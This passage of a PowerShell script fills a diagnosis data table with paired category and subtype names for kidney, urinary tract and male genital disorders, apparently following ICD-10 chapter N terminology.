$null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Unspecified nephritic syndrome","Unspecified nephritic syndrome with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with other morphologic lesion") + $null = $DiagnosisList.Rows.Add("Isolated proteinuria with specified morphological lesion","Isolated proteinuria with unspecified morphologic lesion") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with other morphologic lesions") + $null = $DiagnosisList.Rows.Add("Hereditary nephropathy, not elsewhere classified","Hereditary nephropathy, not elsewhere classified with unspecified morphologic lesions") + $null = $DiagnosisList.Rows.Add("Glomerular disorders in diseases classified elsewhere","Glomerular disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Acute pyelonephritis","Acute pyelonephritis") + $null = $DiagnosisList.Rows.Add("Chronic tubulo-interstitial nephritis","Nonobstructive reflux-associated chronic pyelonephritis") + $null = $DiagnosisList.Rows.Add("Chronic tubulo-interstitial nephritis","Chronic obstructive pyelonephritis") + $null = $DiagnosisList.Rows.Add("Chronic tubulo-interstitial nephritis","Other chronic tubulo-interstitial nephritis") + $null = $DiagnosisList.Rows.Add("Chronic tubulo-interstitial nephritis","Chronic tubulo-interstitial nephritis, unspecified") + $null = $DiagnosisList.Rows.Add("Tubulo-interstitial nephritis, not specified as acute or chronic","Tubulo-interstitial nephritis, not specified as acute or chronic") + $null = $DiagnosisList.Rows.Add("Obstructive and reflux uropathy","Hydronephrosis with ureteropelvic junction obstruction") + $null = $DiagnosisList.Rows.Add("Obstructive and reflux uropathy","Hydronephrosis with ureteral stricture, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Obstructive and reflux uropathy","Hydronephrosis with renal and ureteral calculous obstruction") + $null = $DiagnosisList.Rows.Add("Other and unspecified hydronephrosis","Unspecified hydronephrosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified hydronephrosis","Other hydronephrosis") + $null = $DiagnosisList.Rows.Add("Hydroureter","Hydroureter") + $null = $DiagnosisList.Rows.Add("Crossing vessel and stricture of ureter without hydronephrosis","Crossing vessel and stricture of ureter without hydronephrosis") + $null = $DiagnosisList.Rows.Add("Pyonephrosis","Pyonephrosis") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux","Vesicoureteral-reflux, unspecified") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux","Vesicoureteral-reflux without reflux nephropathy") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy without hydroureter","Vesicoureteral-reflux with reflux nephropathy without hydroureter, unilateral") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy without hydroureter","Vesicoureteral-reflux with reflux nephropathy without hydroureter, bilateral") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy without hydroureter","Vesicoureteral-reflux with reflux nephropathy without hydroureter, unspecified") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy with hydroureter","Vesicoureteral-reflux with reflux nephropathy with hydroureter, unilateral") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy with hydroureter","Vesicoureteral-reflux with reflux nephropathy with hydroureter, bilateral") + $null = $DiagnosisList.Rows.Add("Vesicoureteral-reflux with reflux nephropathy with hydroureter","Vesicoureteral-reflux with reflux nephropathy with hydroureter, unspecified") + $null = $DiagnosisList.Rows.Add("Other obstructive and reflux uropathy","Other obstructive and reflux uropathy") + $null = $DiagnosisList.Rows.Add("Obstructive and reflux uropathy, unspecified","Obstructive and reflux uropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Drug- and heavy-metal-induced tubulo-interstitial and tubular conditions","Analgesic nephropathy") + $null = $DiagnosisList.Rows.Add("Drug- and heavy-metal-induced tubulo-interstitial and tubular conditions","Nephropathy induced by other drugs, medicaments and biological substances") + $null = $DiagnosisList.Rows.Add("Drug- and heavy-metal-induced tubulo-interstitial and tubular conditions","Nephropathy induced by unspecified drug, medicament or biological substance") + $null = $DiagnosisList.Rows.Add("Drug- and heavy-metal-induced tubulo-interstitial and tubular conditions","Nephropathy induced by heavy metals") + $null = $DiagnosisList.Rows.Add("Drug- and heavy-metal-induced tubulo-interstitial and tubular conditions","Toxic nephropathy, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other renal tubulo-interstitial diseases","Balkan nephropathy") + $null = $DiagnosisList.Rows.Add("Other renal tubulo-interstitial diseases","Renal and perinephric abscess") + $null = $DiagnosisList.Rows.Add("Other renal tubulo-interstitial diseases","Other specified renal tubulo-interstitial diseases") + $null = $DiagnosisList.Rows.Add("Other renal tubulo-interstitial diseases","Renal tubulo-interstitial disease, unspecified") + $null = $DiagnosisList.Rows.Add("Renal tubulo-interstitial disorders in diseases classified elsewhere","Renal tubulo-interstitial disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Acute kidney failure","Acute kidney failure with tubular necrosis") + $null = $DiagnosisList.Rows.Add("Acute kidney failure","Acute kidney failure with acute cortical necrosis") + $null = $DiagnosisList.Rows.Add("Acute kidney failure","Acute kidney failure with medullary necrosis") + $null = $DiagnosisList.Rows.Add("Acute kidney failure","Other acute kidney failure") + $null = $DiagnosisList.Rows.Add("Acute kidney failure","Acute kidney failure, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, stage 1") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, stage 2 (mild)") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, stage 3 (moderate)") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, stage 4 (severe)") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, stage 5") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","End stage renal disease") + $null = $DiagnosisList.Rows.Add("Chronic kidney disease (CKD)","Chronic kidney disease, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified kidney failure","Unspecified kidney failure") + $null = $DiagnosisList.Rows.Add("Calculus of kidney and ureter","Calculus of kidney") + $null = $DiagnosisList.Rows.Add("Calculus of kidney and ureter","Calculus of ureter") + $null = $DiagnosisList.Rows.Add("Calculus of kidney and ureter","Calculus of kidney with calculus of ureter") + $null = $DiagnosisList.Rows.Add("Calculus of kidney and ureter","Urinary calculus, unspecified") + $null = $DiagnosisList.Rows.Add("Calculus of lower urinary tract","Calculus in bladder") + $null = $DiagnosisList.Rows.Add("Calculus of lower urinary tract","Calculus in urethra") + $null = $DiagnosisList.Rows.Add("Calculus of lower urinary tract","Other lower urinary tract calculus") + $null = $DiagnosisList.Rows.Add("Calculus of lower urinary tract","Calculus of lower urinary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Calculus of urinary tract in diseases classified elsewhere","Calculus of urinary tract in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Unspecified renal colic","Unspecified renal colic") + $null = $DiagnosisList.Rows.Add("Disorders resulting from impaired renal tubular function","Renal osteodystrophy") + $null = $DiagnosisList.Rows.Add("Disorders resulting from impaired renal tubular function","Nephrogenic diabetes insipidus") + $null = $DiagnosisList.Rows.Add("Other disorders resulting from impaired renal tubular function","Secondary hyperparathyroidism of renal origin") + $null = $DiagnosisList.Rows.Add("Other disorders resulting from impaired renal tubular function","Other disorders resulting from impaired renal tubular function") + $null = $DiagnosisList.Rows.Add("Disorder resulting from impaired renal tubular function, unspecified","Disorder resulting from impaired renal tubular function, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified contracted kidney","Atrophy of kidney (terminal)") + $null = $DiagnosisList.Rows.Add("Unspecified contracted kidney","Page kidney") + $null = $DiagnosisList.Rows.Add("Unspecified contracted kidney","Renal sclerosis, unspecified") + $null = $DiagnosisList.Rows.Add("Small kidney of unknown cause","Small kidney, unilateral") + $null = $DiagnosisList.Rows.Add("Small kidney of unknown cause","Small kidney, bilateral") + $null = $DiagnosisList.Rows.Add("Small kidney of unknown cause","Small kidney, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of kidney and ureter, not elsewhere classified","Ischemia and infarction of kidney") + $null = $DiagnosisList.Rows.Add("Other disorders of kidney and ureter, not elsewhere classified","Cyst of kidney, acquired") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Hypertrophy of kidney") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Megaloureter") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Nephroptosis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Pyelitis cystica") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Pyeloureteritis cystica") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Ureteritis cystica") + $null = $DiagnosisList.Rows.Add("Other specified disorders of kidney and ureter","Other specified disorders of kidney and ureter") + $null = $DiagnosisList.Rows.Add("Disorder of kidney and ureter, unspecified","Disorder of kidney and ureter, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of kidney and ureter in diseases classified elsewhere","Other disorders of kidney and ureter in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Acute cystitis","Acute cystitis without hematuria") + $null = $DiagnosisList.Rows.Add("Acute cystitis","Acute cystitis with hematuria") + $null = $DiagnosisList.Rows.Add("Interstitial cystitis (chronic)","Interstitial cystitis (chronic) without hematuria") + $null = $DiagnosisList.Rows.Add("Interstitial cystitis (chronic)","Interstitial cystitis (chronic) with hematuria") + $null = $DiagnosisList.Rows.Add("Other chronic cystitis","Other chronic cystitis without hematuria") + $null = $DiagnosisList.Rows.Add("Other chronic cystitis","Other chronic cystitis with hematuria") + $null = $DiagnosisList.Rows.Add("Trigonitis","Trigonitis without hematuria") + $null = $DiagnosisList.Rows.Add("Trigonitis","Trigonitis with hematuria") + $null = $DiagnosisList.Rows.Add("Irradiation cystitis","Irradiation cystitis without hematuria") + $null = $DiagnosisList.Rows.Add("Irradiation cystitis","Irradiation cystitis with hematuria") + $null = $DiagnosisList.Rows.Add("Other cystitis","Other cystitis without hematuria") + $null = $DiagnosisList.Rows.Add("Other cystitis","Other cystitis with hematuria") + $null = $DiagnosisList.Rows.Add("Cystitis, unspecified","Cystitis, unspecified without hematuria") + $null = $DiagnosisList.Rows.Add("Cystitis, unspecified","Cystitis, unspecified with hematuria") + $null = $DiagnosisList.Rows.Add("Neuromuscular dysfunction of bladder, not elsewhere classified","Uninhibited neuropathic bladder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Neuromuscular dysfunction of bladder, not elsewhere classified","Reflex neuropathic bladder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Neuromuscular dysfunction of bladder, not elsewhere classified","Flaccid neuropathic bladder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Neuromuscular dysfunction of bladder, not elsewhere classified","Other neuromuscular dysfunction of bladder") + $null = $DiagnosisList.Rows.Add("Neuromuscular dysfunction of bladder, not elsewhere classified","Neuromuscular dysfunction of bladder, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of bladder","Bladder-neck obstruction") + $null = $DiagnosisList.Rows.Add("Other disorders of bladder","Vesicointestinal fistula") + $null = $DiagnosisList.Rows.Add("Other disorders of bladder","Vesical fistula, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other disorders of bladder","Diverticulum of bladder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bladder","Overactive bladder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of bladder","Other specified disorders of bladder") + $null = $DiagnosisList.Rows.Add("Bladder disorder, unspecified","Bladder disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Bladder disorders in diseases classified elsewhere","Bladder disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Urethritis and urethral syndrome","Urethral abscess") + $null = $DiagnosisList.Rows.Add("Urethritis and urethral syndrome","Nonspecific urethritis") + $null = $DiagnosisList.Rows.Add("Urethritis and urethral syndrome","Other urethritis") + $null = $DiagnosisList.Rows.Add("Urethritis and urethral syndrome","Urethral syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, male","Post-traumatic urethral stricture, male, meatal") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, male","Post-traumatic bulbous urethral stricture") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, male","Post-traumatic membranous urethral stricture") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, male","Post-traumatic anterior urethral stricture") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, male","Post-traumatic urethral stricture, male, unspecified") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, female","Urethral stricture due to childbirth") + $null = $DiagnosisList.Rows.Add("Post-traumatic urethral stricture, female","Other post-traumatic urethral stricture, female") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, male","Postinfective urethral stricture, not elsewhere classified, male, meatal") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, male","Postinfective bulbous urethral stricture, not elsewhere classified, male") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, male","Postinfective membranous urethral stricture, not elsewhere classified, male") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, male","Postinfective anterior urethral stricture, not elsewhere classified, male") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, male","Postinfective urethral stricture, not elsewhere classified, male, unspecified") + $null = $DiagnosisList.Rows.Add("Postinfective urethral stricture, not elsewhere classified, female","Postinfective urethral stricture, not elsewhere classified, female") + $null = $DiagnosisList.Rows.Add("Other urethral stricture","Other urethral stricture") + $null = $DiagnosisList.Rows.Add("Urethral stricture, unspecified","Urethral stricture, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of urethra","Urethral fistula") + $null = $DiagnosisList.Rows.Add("Other disorders of urethra","Urethral diverticulum") + $null = $DiagnosisList.Rows.Add("Other disorders of urethra","Urethral caruncle") + $null = $DiagnosisList.Rows.Add("Urethral functional and muscular disorders","Hypermobility of urethra") + $null = $DiagnosisList.Rows.Add("Urethral functional and muscular disorders","Intrinsic sphincter deficiency (ISD)") + $null = $DiagnosisList.Rows.Add("Urethral functional and muscular disorders","Combined hypermobility of urethra and intrinsic sphincter deficiency") + $null = $DiagnosisList.Rows.Add("Urethral functional and muscular disorders","Muscular disorders of urethra") + $null = $DiagnosisList.Rows.Add("Urethral false passage","Urethral false passage") + $null = $DiagnosisList.Rows.Add("Other specified disorders of urethra","Other specified disorders of urethra") + $null = $DiagnosisList.Rows.Add("Urethral disorder, unspecified","Urethral disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Urethral disorders in diseases classified elsewhere","Urethral disorders in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of urinary system","Urinary tract infection, site not specified") + $null = $DiagnosisList.Rows.Add("Other disorders of urinary system","Stress incontinence (female) (male)") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Urge incontinence") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Incontinence without sensory awareness") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Post-void dribbling") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Nocturnal enuresis") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Continuous leakage") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Mixed incontinence") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Overflow incontinence") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Coital incontinence") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Postural (urinary) incontinence") + $null = $DiagnosisList.Rows.Add("Other specified urinary incontinence","Other specified urinary incontinence") + $null = $DiagnosisList.Rows.Add("Other specified disorders of urinary system","Other specified disorders of urinary system") + $null = $DiagnosisList.Rows.Add("Disorder of urinary system, unspecified","Disorder of urinary system, unspecified") + $null = $DiagnosisList.Rows.Add("Benign prostatic hyperplasia","Benign prostatic hyperplasia without lower urinary tract symptoms") + $null = $DiagnosisList.Rows.Add("Benign prostatic hyperplasia","Benign prostatic hyperplasia with lower urinary tract symptoms") + $null = $DiagnosisList.Rows.Add("Benign prostatic hyperplasia","Nodular prostate without lower urinary tract symptoms") + $null = $DiagnosisList.Rows.Add("Benign prostatic hyperplasia","Nodular prostate with lower urinary tract symptoms") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Acute prostatitis") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Chronic prostatitis") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Abscess of prostate") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Prostatocystitis") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Granulomatous prostatitis") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Other inflammatory diseases of prostate") + $null = $DiagnosisList.Rows.Add("Inflammatory diseases of prostate","Inflammatory disease of prostate, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of prostate","Calculus of prostate") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of prostate","Congestion and hemorrhage of prostate") + $null = $DiagnosisList.Rows.Add("Dysplasia of prostate","Unspecified dysplasia of prostate") + $null = $DiagnosisList.Rows.Add("Dysplasia of prostate","Prostatic intraepithelial neoplasia") + $null = $DiagnosisList.Rows.Add("Dysplasia of prostate","Atypical small acinar proliferation of prostate") + $null = $DiagnosisList.Rows.Add("Dysplasia of prostate","Other dysplasia of prostate") + $null = $DiagnosisList.Rows.Add("Other specified disorders of prostate","Prostatodynia syndrome") + $null = $DiagnosisList.Rows.Add("Other specified disorders of prostate","Prostatosis syndrome") + $null = $DiagnosisList.Rows.Add("Other specified disorders of prostate","Cyst of prostate") + $null = $DiagnosisList.Rows.Add("Other specified disorders of prostate","Other specified disorders of prostate") + $null = $DiagnosisList.Rows.Add("Disorder of prostate, unspecified","Disorder of prostate, unspecified") + $null = $DiagnosisList.Rows.Add("Hydrocele and spermatocele","Encysted hydrocele") + $null = $DiagnosisList.Rows.Add("Hydrocele and spermatocele","Infected hydrocele") + $null = $DiagnosisList.Rows.Add("Hydrocele and spermatocele","Other hydrocele") + $null = $DiagnosisList.Rows.Add("Hydrocele and spermatocele","Hydrocele, unspecified") + $null = $DiagnosisList.Rows.Add("Spermatocele of epididymis","Spermatocele of epididymis, unspecified") + $null = $DiagnosisList.Rows.Add("Spermatocele of epididymis","Spermatocele of epididymis, single") + $null = $DiagnosisList.Rows.Add("Spermatocele of epididymis","Spermatocele of epididymis, multiple") + $null = $DiagnosisList.Rows.Add("Torsion of testis","Torsion of testis, unspecified") + $null = $DiagnosisList.Rows.Add("Torsion of testis","Extravaginal torsion of spermatic cord") + $null = $DiagnosisList.Rows.Add("Torsion of testis","Intravaginal torsion of spermatic cord") + $null = $DiagnosisList.Rows.Add("Torsion of testis","Torsion of appendix testis") + $null = $DiagnosisList.Rows.Add("Torsion of testis","Torsion of appendix epididymis") + $null = $DiagnosisList.Rows.Add("Cyst of tunica albuginea testis","Cyst of tunica albuginea testis") + $null = $DiagnosisList.Rows.Add("Benign cyst of testis","Benign cyst of testis") + $null = $DiagnosisList.Rows.Add("Other noninflammatory disorders of the testis","Other noninflammatory disorders of the testis") + $null = $DiagnosisList.Rows.Add("Orchitis and epididymitis","Epididymitis") + $null = $DiagnosisList.Rows.Add("Orchitis and epididymitis","Orchitis") + $null = $DiagnosisList.Rows.Add("Orchitis and epididymitis","Epididymo-orchitis") + $null = $DiagnosisList.Rows.Add("Orchitis and epididymitis","Abscess of epididymis or testis") + $null = $DiagnosisList.Rows.Add("Azoospermia","Organic azoospermia") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to drug therapy") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to infection") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to obstruction of efferent ducts") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to radiation") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to systemic disease") + $null = $DiagnosisList.Rows.Add("Azoospermia due to extratesticular causes","Azoospermia due to other extratesticular causes") + $null = $DiagnosisList.Rows.Add("Oligospermia","Organic oligospermia") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to drug therapy") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to infection") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to obstruction of efferent ducts") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to radiation") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to systemic disease") + $null = $DiagnosisList.Rows.Add("Oligospermia due to extratesticular causes","Oligospermia due to other extratesticular causes") + $null = $DiagnosisList.Rows.Add("Other male infertility","Other male infertility") + $null = $DiagnosisList.Rows.Add("Male infertility, unspecified","Male infertility, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Adherent prepuce, newborn") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Phimosis") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Paraphimosis") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Deficient foreskin") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Benign cyst of prepuce") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Adhesions of prepuce and glans penis") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Balanoposthitis") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Other inflammatory diseases of prepuce") + $null = $DiagnosisList.Rows.Add("Disorders of prepuce","Other disorders of prepuce") + $null = $DiagnosisList.Rows.Add("Other disorders of penis","Leukoplakia of penis") + $null = $DiagnosisList.Rows.Add("Other disorders of penis","Balanitis") + $null = $DiagnosisList.Rows.Add("Other inflammatory disorders of penis","Abscess of corpus cavernosum and penis") + $null = $DiagnosisList.Rows.Add("Other inflammatory disorders of penis","Cellulitis of corpus cavernosum and penis") + $null = $DiagnosisList.Rows.Add("Other inflammatory disorders of penis","Other inflammatory disorders of penis") + $null = $DiagnosisList.Rows.Add("Priapism","Priapism, unspecified") + $null = $DiagnosisList.Rows.Add("Priapism","Priapism due to trauma") + $null = $DiagnosisList.Rows.Add("Priapism","Priapism due to disease classified elsewhere") + $null = $DiagnosisList.Rows.Add("Priapism","Priapism, drug-induced") + $null = $DiagnosisList.Rows.Add("Priapism","Other priapism") + $null = $DiagnosisList.Rows.Add("Ulcer of penis","Ulcer of penis") + $null = $DiagnosisList.Rows.Add("Induration penis plastica","Induration penis plastica") + $null = $DiagnosisList.Rows.Add("Other specified disorders of penis","Thrombosis of superficial vein of penis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of penis","Acquired torsion of penis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of penis","Acquired buried penis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of penis","Other specified disorders of penis") + $null = $DiagnosisList.Rows.Add("Disorder of penis, unspecified","Disorder of penis, unspecified") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Inflammatory disorders of seminal vesicle") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Inflammatory disorders of spermatic cord, tunica vaginalis and vas deferens") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Inflammatory disorders of scrotum") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Fournier gangrene") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Inflammatory disorders of other specified male genital organs") + $null = $DiagnosisList.Rows.Add("Inflammatory disorders of male genital organs, not elsewhere classified","Inflammatory disorder of unspecified male genital organ") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of male genital organs","Atrophy of testis") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of male genital organs","Vascular disorders of male genital organs") + $null = $DiagnosisList.Rows.Add("Other and unspecified disorders of male genital organs","Cyst of epididymis") + $null = $DiagnosisList.Rows.Add("Testicular pain","Right testicular pain") + $null = $DiagnosisList.Rows.Add("Testicular pain","Left testicular pain") + $null = $DiagnosisList.Rows.Add("Testicular pain","Testicular pain, unspecified") + $null = $DiagnosisList.Rows.Add("Scrotal pain","Scrotal pain") + $null = $DiagnosisList.Rows.Add("Other specified disorders of the male genital organs","Other specified disorders of the male genital organs") + $null = $DiagnosisList.Rows.Add("Disorder of male genital organs, unspecified","Disorder of male genital organs, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of male genital organs in diseases classified elsewhere","Disorders of male genital organs in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Vasculogenic erectile dysfunction","Erectile dysfunction due to arterial insufficiency") + $null = $DiagnosisList.Rows.Add("Vasculogenic erectile dysfunction","Corporo-venous occlusive erectile dysfunction") + $null = $DiagnosisList.Rows.Add("Vasculogenic erectile dysfunction","Combined arterial insufficiency and corporo-venous occlusive erectile dysfunction") + $null = 